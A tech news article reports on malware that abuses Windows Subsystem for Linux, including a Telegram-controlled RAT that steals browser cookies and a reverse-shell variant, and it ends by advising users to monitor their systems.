Malware WSL appeared with the ability to steal browser authentication cookies
Hackers are showing particular interest in Windows Subsystem for Linux (WSL). When developing malware, hackers are seeing WSL as a new attack surface. Malware attacking via WSL has advanced configuration with the ability to spy or download and install additional malicious modules.
As the name suggests, WSL allows running Linux binaries natively on Windows in a Linux kernel emulation environment.
Based on newly obtained samples, the researchers found that malware targeting WSL is based on open source code that routes communication through the messaging service Telegram and allows remote attackers to gain access to the compromised system. .
The first WSL malware was discovered about a year ago. Since then, their number has continuously increased. Although based on publicly available source code, the ability to detect WSL malware is very low.
Among the samples analyzed, the most notable was a piece of malware that could act as a remote access tool (RAT) or set up a reverse shell on an infected host.
One of the more recent models called RAT-via-Telegram is based on the open source tool Pythoon. It has additional functions to steal authentication cookies from Google Chrome and Opera browsers, run commands or download files.
Black Lotus Labs researchers shared that this malware comes with bot token and live chat ID. This shows that it depends on a dynamic command and control mechanism.
Additional functions of this variant include taking screenshots, obtaining user and system information (username, IP address.) to help attackers easily determine what kind of malicious code they should use in next step. Only 2 of the 57 tools on Virus Total flag this malware as malicious.
A second recently discovered WSL malware installs a reverse TCP shell on the infected computer to communicate with attackers. Looking at the code, the researchers found that it used an IP address from Amazon Web Services that was previously used by several entities.
Both of these malware can be used for spying purposes and can download files that extend their functionality.
Over the years, malware creators have improved their skills and are able to create malware that can work on both Windows and Linux. Besides, malware can now simultaneously upload or download files or execute attacker commands.
According to researchers, malware will grow more and more sophisticated. Therefore, to protect themselves or their business, users need to closely monitor system activity (e.g. SysMon) to identify suspicious activity and investigate commands.
You should read it
- Appears new malware specializing in stealing Steam, Epic Games and EA Origin accounts
- Detecting Android malware can easily steal OTP code without the victim knowing
- Malware spreads through crack software specializing in stealing Facebook, Instagram, and Twitter accounts
- What is FormBook Malware? How to remove?
- Things to know about Gauss malware
- How many types of malware do you know and how to prevent them?
- 10 typical malware types
- What is Safe Malware? Why is it so dangerous?
- Can a VPN Fight Malware?
- What is Malware? What kind of attack is Malware?
- Malware can steal Facebook, Twitter and Gmail accounts
- The 4 most common ways to spread malware today
Maybe you are interested
This Simple Android App Proves Anything Can Contain Malware
BadBox Malware Is Picking Up Speed, Targeting Certain Android Devices
Warning of new dangerous malware attack campaign targeting Linux
Downloaded malware? Try these fixes before factory reset!
SteelFox Trojan: Malware Turns PCs Into Cryptocurrency Mining Zombies
Remcos Alert: Ingenious Excel Phishing Campaign Spreading Dangerous Fileless Malware